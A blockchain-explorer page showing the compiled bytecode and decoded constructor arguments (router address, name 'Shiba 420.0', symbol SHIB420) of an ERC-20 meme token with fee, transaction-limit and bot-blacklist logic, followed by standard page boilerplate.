8036038101906108079190612f8e565b611293565b005b34801561081a57600080fd5b5061083560048036038101906108309190612fbb565b6112ef565b6040516108429190612dbb565b60405180910390f35b34801561085757600080fd5b5061086061130f565b60405161086d9190612e50565b60405180910390f35b34801561088257600080fd5b5061089d600480360381019061089891906131b1565b611315565b6040516108aa9190612e50565b60405180910390f35b3480156108bf57600080fd5b506108da60048036038101906108d59190612e97565b61139c565b005b3480156108e857600080fd5b506108f1611439565b60405161090295949392919061315e565b60405180910390f35b34801561091757600080fd5b50610932600480360381019061092d9190612fbb565b61145d565b005b34801561094057600080fd5b506109496114e0565b60405161095a95949392919061315e565b60405180910390f35b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606003805461099890613220565b80601f01602080910402602001604051908101604052809291908181526020018280546109c490613220565b8015610a115780601f106109e657610100808354040283529160200191610a11565b820191906000526020600020905b8154815290600101906020018083116109f457829003601f168201915b5050505050905090565b600080610a26611504565b9050610a3381858561150c565b600191505092915050565b610a466116d5565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0f9ab6c7b3a29f5eca7cf80f42ea6b1262432064b221200268394c9a5e63569f60405160405180910390a3610af4600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610b70565b81600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610b62600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610b70565b5050565b6000600254905090565b610b786116d5565b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600080610bde611504565b9050610beb858285611753565b610bf68585856117df565b60019150509392505050565b610c0a6116d5565b6001601760006101000a81548160ff021916908315150217905550565b6000600654821115610c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c65906132c3565b60405180910390fd5b610c76611e09565b82610c819190613341565b9050919050565b60006012905090565b600080610c9c611504565b9050610cbd818585610cae8589611315565b610cb89190613372565b61150c565b600191505092915050565b60004790506000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051610d15906133d7565b60006040518083038185875af1925050503d8060008114610d52576040519150601f19603f3d011682016040523d82523d6000602084013e610d57565b606091505b5050809150505050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610df55750610dc6610fa5565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610e34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2b9061345e565b60405180910390fd5b80601760036101000a81548160ff02191690831515021790555050565b60145481565b600a5481565b60106020528060005260406000206000915054906101000a900460ff1681565b6000606482610e8b30610eb8565b610e95919061347e565b610e9f9190613341565b90506000811115610eb457610eb381611e25565b5b5050565b6000610f02600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c27565b9050919050565b610f116116d5565b610f1b60006121a9565b565b610f256116d5565b8015610f68578160186000820151816000015560208201518160010155604082015181600201556060820151816003015560808201518160040155905050610fa1565b81601d60008201518160000155602082015181600101556040820151816002015560608201518160030155608082015181600401559050505b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610fde90613220565b80601f016020809104026020016040519081016040528092919081815260200182805461100a90613220565b80156110575780601f1061102c57610100808354040283529160200191611057565b820191906000526020600020905b81548152906001019060200180831161103a57829003601f168201915b5050505050905090565b6110696116d5565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f194c6407864834414a3adaa18aab4cb81b733d5986a0c3b1e0fc9a8bccc0c0fb60405160405180910390a3611117600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610b70565b81600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611185600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610b70565b5050565b60116020528060005260406000206000915054906101000a900460ff1681565b60126020528060005260406000206000915054906101000a900460ff1681565b6000806111d4611504565b905060006111e28286611315565b905083811015611227576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121e90613532565b60405180910390fd5b611234828686840361150c565b60019250505092915050565b60008061124b611504565b90506112588185856117df565b600191505092915050565b600c5481565b60228060000154908060010154908060020154908060030154908060040154905085565b60165481565b61129b6116d5565b80601760026101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc159816040516112e49190612dbb565b60405180910390a150565b60136020528060005260406000206000915054906101000a900460ff1681565b60155481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6113a46116d5565b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015157f3159dadbd8e2d720a851b412e3358e7e44bb11734c9bfd5715340e21798e8b258360405161142d9190613143565b60405180910390a25050565b60188060000154908060010154908060020154908060030154908060040154905085565b6114656116d5565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036114d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114cb906135c4565b60405180910390fd5b6114dd816121a9565b50565b601d8060000154908060010154908060020154908060030154908060040154905085565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361157b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161157290613656565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e1906136e8565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116c89190612e50565b60405180910390a3505050565b6116dd611504565b73ffffffffffffffffffffffffffffffffffffffff166116fb610fa5565b73ffffffffffffffffffffffffffffffffffffffff1614611751576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174890613754565b60405180910390fd5b565b600061175f8484611315565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146117d957818110156117cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c2906137c0565b60405180910390fd5b6117d8848484840361150c565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361184e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161184590613852565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036118bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b4906138e4565b60405180910390fd5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561194a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194190613950565b60405180910390fd5b6000811161198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906139e2565b60405180910390fd5b61199683610eb8565b8111156119d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119cf90613a74565b60405180910390fd5b6000601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611a7b5750601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1590508015611c4657601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611bc657601760009054906101000a900460ff16611b43576001601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b601860226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600b54821115611bc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb890613ae0565b60405180910390fd5b611c45565b601d60226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600c54821115611c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3b90613b72565b60405180910390fd5b5b5b601760019054906101000a900460ff16158015611cad5750601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611cc55750601760029054906101000a900460ff165b8015611d045750611cd4610fa5565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611d435750611d13610fa5565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611d9d5750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611db35750600d54611db030610eb8565b10155b15611df7576001601760016101000a81548160ff021916908315150217905550611ddb61226f565b6000601760016101000a81548160ff0219169083151502179055505b611e03848484846122c3565b50505050565b6000611e13610b66565b600654611e209190613341565b905090565b6000602760040154602760030154602760020154611e439190613372565b611e4d9190613372565b905060008060028360276004015486611e66919061347e565b611e709190613341565b611e7a9190613341565b905060008185611e8a9190613b92565b90506000479050611e9a82612690565b60008147611ea89190613b92565b905060008660276003015483611ebe919061347e565b611ec89190613341565b905060008760276002015484611ede919061347e565b611ee89190613341565b90506000818385611ef99190613b92565b611f039190613b92565b905060276004015460156000828254611f1c9190613372565b92505081905550600060276004018190555060006027600201819055506000602760030181905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611f8a906133d7565b60006040518083038185875af1925050503d8060008114611fc7576040519150601f19603f3d011682016040523d82523d6000602084013e611fcc565b606091505b505080985050600087118015611fe25750600081115b8015612001575060011515601760039054906101000a900460ff161515145b1561210f57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71982308a600080600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b815260040161208f96959493929190613c22565b60606040518083038185885af11580156120ad573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906120d29190613c98565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b8782604051612106929190613ceb565b60405180910390a15b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1683604051612155906133d7565b60006040518083038185875af1925050503d8060008114612192576040519150601f19603f3d011682016040523d82523d6000602084013e612197565b606091505b50508098505050505050505050505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061227a30610eb8565b9050600d548111156122c0576014600d54612295919061347e565b8111156122ae576014600d546122ab919061347e565b90505b6122bf6122ba30610eb8565b611e25565b5b50565b6122cb612b54565b6122d3612b54565b6122dd84846128a6565b809250819350505060008260c00151856122f79190613b92565b90506000612303611e09565b8661230e919061347e565b905060008360c00151826123229190613b92565b9050601260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806123915750600a54836123848a610eb8565b61238e9190613372565b11155b6123d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123c790613d86565b60405180910390fd5b81600e60008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461241f9190613b92565b9250508190555080600e60008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546124759190613372565b925050819055508515612620578360000151600660008282546124989190613b92565b925050819055508460000151601460008282546124b59190613372565b925050819055506124c68585612a96565b600060226000015411156125b6578460200151601660008282546124ea9190613372565b925050819055508360200151600e60008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546125449190613372565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87602001516040516125ad9190612e50565b60405180910390a35b3073ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760a001516040516126179190612e50565b60405180910390a35b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161267d9190612e50565b60405180910390a3505050505050505050565b6000600267ffffffffffffffff8111156126ad576126ac612fed565b5b6040519080825280602002602001820160405280156126db5781602001602082028036833780820191505090505b50905030816000815181106126f3576126f2613da6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561279a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127be9190613dea565b816001815181106127d2576127d1613da6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612870959493929190613ed5565b600060405180830381600087803b15801561288a57600080fd5b505af115801561289e573d6000803e3d6000fd5b505050505050565b6128ae612b54565b6128b6612b54565b8215612a8f5760006128c6611e09565b90506064602260040154866128db919061347e565b6128e59190613341565b836000018181525050606460226000015486612901919061347e565b61290b9190613341565b836020018181525050606460226003015486612927919061347e565b6129319190613341565b83604001818152505060646022600201548661294d919061347e565b6129579190613341565b836060018181525050606460226001015486612973919061347e565b61297d9190613341565b83608001818152505082608001518360600151846040015161299f9190613372565b6129a99190613372565b8360a00181815250508260a00151836020015184600001516129cb9190613372565b6129d59190613372565b8360c00181815250508083600001516129ee919061347e565b826000018181525050808360200151612a07919061347e565b826020018181525050808360400151612a20919061347e565b826040018181525050808360600151612a39919061347e565b826060018181525050808360800151612a52919061347e565b826080018181525050808360c00151612a6b919061347e565b8260c0018181525050808360a00151612a84919061347e565b8260a0018181525050505b9250929050565b8060a00151600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612ae99190613372565b92505081905550816080015160276004016000828254612b099190613372565b92505081905550816040015160276002016000828254612b299190613372565b92505081905550816060015160276003016000828254612b499190613372565b925050819055505050565b6040518060e00160405280600081526020016000815260200160008152602001600081526020016000815260200160008152602001600081525090565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612bd6612bd1612bcc84612b91565b612bb1565b612b91565b9050919050565b6000612be882612bbb565b9050919050565b6000612bfa82612bdd565b9050919050565b612c0a81612bef565b82525050565b6000602082019050612c256000830184612c01565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612c65578082015181840152602081019050612c4a565b60008484015250505050565b6000601f19601f8301169050919050565b6000612c8d82612c2b565b612c978185612c36565b9350612ca7818560208601612c47565b612cb081612c71565b840191505092915050565b60006020820190508181036000830152612cd58184612c82565b905092915050565b6000604051905090565b600080fd5b6000612cf782612b91565b9050919050565b612d0781612cec565b8114612d1257600080fd5b50565b600081359050612d2481612cfe565b92915050565b6000819050919050565b612d3d81612d2a565b8114612d4857600080fd5b50565b600081359050612d5a81612d34565b92915050565b60008060408385031215612d7757612d76612ce7565b5b6000612d8585828601612d15565b9250506020612d9685828601612d4b565b9150509250929050565b60008115159050919050565b612db581612da0565b82525050565b6000602082019050612dd06000830184612dac565b92915050565b6000612de182612b91565b9050919050565b612df181612dd6565b8114612dfc57600080fd5b50565b600081359050612e0e81612de8565b92915050565b600060208284031215612e2a57612e29612ce7565b5b6000612e3884828501612dff565b91505092915050565b612e4a81612d2a565b82525050565b6000602082019050612e656000830184612e41565b92915050565b612e7481612da0565b8114612e7f57600080fd5b50565b600081359050612e9181612e6b565b92915050565b60008060408385031215612eae57612ead612ce7565b5b6000612ebc85828601612d15565b9250506020612ecd85828601612e82565b9150509250929050565b600080600060608486031215612ef057612eef612ce7565b5b6000612efe86828701612d15565b9350506020612f0f86828701612d15565b9250506040612f2086828701612d4b565b9150509250925092565b600060208284031215612f4057612f3f612ce7565b5b6000612f4e84828501612d4b565b91505092915050565b600060ff82169050919050565b612f6d81612f57565b82525050565b6000602082019050612f886000830184612f64565b92915050565b600060208284031215612fa457612fa3612ce7565b5b6000612fb284828501612e82565b91505092915050565b600060208284031215612fd157612fd0612ce7565b5b6000612fdf84828501612d15565b91505092915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61302582612c71565b810181811067ffffffffffffffff8211171561304457613043612fed565b5b80604052505050565b6000613057612cdd565b9050613063828261301c565b919050565b600060a0828403121561307e5761307d612fe8565b5b61308860a061304d565b9050600061309884828501612d4b565b60008301525060206130ac84828501612d4b565b60208301525060406130c084828501612d4b565b60408301525060606130d484828501612d4b565b60608301525060806130e884828501612d4b565b60808301525092915050565b60008060c0838503121561310b5761310a612ce7565b5b600061311985828601613068565b92505060a061312a85828601612e82565b9150509250929050565b61313d81612cec565b82525050565b60006020820190506131586000830184613134565b92915050565b600060a0820190506131736000830188612e41565b6131806020830187612e41565b61318d6040830186612e41565b61319a6060830185612e41565b6131a76080830184612e41565b9695505050505050565b600080604083850312156131c8576131c7612ce7565b5b60006131d685828601612d15565b92505060206131e785828601612d15565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061323857607f821691505b60208210810361324b5761324a6131f1565b5b50919050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b60006132ad602a83612c36565b91506132b882613251565b604082019050919050565b600060208201905081810360008301526132dc816132a0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061334c82612d2a565b915061335783612d2a565b925082613367576133666132e3565b5b828204905092915050565b600061337d82612d2a565b915061338883612d2a565b92508282019050808211156133a05761339f613312565b5b92915050565b600081905092915050565b50565b60006133c16000836133a6565b91506133cc826133b1565b600082019050919050565b60006133e2826133b4565b9150819050919050565b7f4f6e6c7920646576656c6f706572732063616e206368616e676520746869732060008201527f666c616700000000000000000000000000000000000000000000000000000000602082015250565b6000613448602483612c36565b9150613453826133ec565b604082019050919050565b600060208201905081810360008301526134778161343b565b9050919050565b600061348982612d2a565b915061349483612d2a565b92508282026134a281612d2a565b915082820484148315176134b9576134b8613312565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061351c602583612c36565b9150613527826134c0565b604082019050919050565b6000602082019050818103600083015261354b8161350f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006135ae602683612c36565b91506135b982613552565b604082019050919050565b600060208201905081810360008301526135dd816135a1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000613640602483612c36565b915061364b826135e4565b604082019050919050565b6000602082019050818103600083015261366f81613633565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006136d2602283612c36565b91506136dd82613676565b604082019050919050565b60006020820190508181036000830152613701816136c5565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061373e602083612c36565b915061374982613708565b602082019050919050565b6000602082019050818103600083015261376d81613731565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006137aa601d83612c36565b91506137b582613774565b602082019050919050565b600060208201905081810360008301526137d98161379d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061383c602583612c36565b9150613847826137e0565b604082019050919050565b6000602082019050818103600083015261386b8161382f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006138ce602383612c36565b91506138d982613872565b604082019050919050565b600060208201905081810360008301526138fd816138c1565b9050919050565b7f45524332303a206164647265737320626c61636b6c69737465642028626f7429600082015250565b600061393a602083612c36565b915061394582613904565b602082019050919050565b600060208201905081810360008301526139698161392d565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006139cc602983612c36565b91506139d782613970565b604082019050919050565b600060208201905081810360008301526139fb816139bf565b9050919050565b7f596f752061726520747279696e6720746f207472616e73666572206d6f72652060008201527f7468616e20796f75722062616c616e6365000000000000000000000000000000602082015250565b6000613a5e603183612c36565b9150613a6982613a02565b604082019050919050565b60006020820190508181036000830152613a8d81613a51565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e74427579600082015250565b6000613aca602083612c36565b9150613ad582613a94565b602082019050919050565b60006020820190508181036000830152613af981613abd565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e7453656c60008201527f6c00000000000000000000000000000000000000000000000000000000000000602082015250565b6000613b5c602183612c36565b9150613b6782613b00565b604082019050919050565b60006020820190508181036000830152613b8b81613b4f565b9050919050565b6000613b9d82612d2a565b9150613ba883612d2a565b9250828203905081811115613bc057613bbf613312565b5b92915050565b6000819050919050565b6000613beb613be6613be184613bc6565b612bb1565b612d2a565b9050919050565b613bfb81613bd0565b82525050565b6000613c0c82612bdd565b9050919050565b613c1c81613c01565b82525050565b600060c082019050613c376000830189613134565b613c446020830188612e41565b613c516040830187613bf2565b613c5e6060830186613bf2565b613c6b6080830185613c13565b613c7860a0830184612e41565b979650505050505050565b600081519050613c9281612d34565b92915050565b600080600060608486031215613cb157613cb0612ce7565b5b6000613cbf86828701613c83565b9350506020613cd086828701613c83565b9250506040613ce186828701613c83565b9150509250925092565b6000604082019050613d006000830185612e41565b613d0d6020830184612e41565b9392505050565b7f526563697069656e742063616e6e6f7420686f6c64206d6f7265207468616e2060008201527f6d617857616c6c6574416d6f756e740000000000000000000000000000000000602082015250565b6000613d70602f83612c36565b9150613d7b82613d14565b604082019050919050565b60006020820190508181036000830152613d9f81613d63565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613de481612cfe565b92915050565b600060208284031215613e0057613dff612ce7565b5b6000613e0e84828501613dd5565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613e4c81612cec565b82525050565b6000613e5e8383613e43565b60208301905092915050565b6000602082019050919050565b6000613e8282613e17565b613e8c8185613e22565b9350613e9783613e33565b8060005b83811015613ec8578151613eaf8882613e52565b9750613eba83613e6a565b925050600181019050613e9b565b5085935050505092915050565b600060a082019050613eea6000830188612e41565b613ef76020830187613bf2565b8181036040830152613f098186613e77565b9050613f186060830185613134565b613f256080830184612e41565b969550505050505056fea2646970667358221220ea60a74066af9482bbf2a90dddf9dbee5e825c4ed65ffab19607322d37a5830f64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000000b5368696261203432302e3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075348494234323000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : swap (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [1] : name (string): Shiba 420.0
Arg [2] : symbol (string): SHIB420

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [2] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [4] : 5368696261203432302e30000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 5348494234323000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.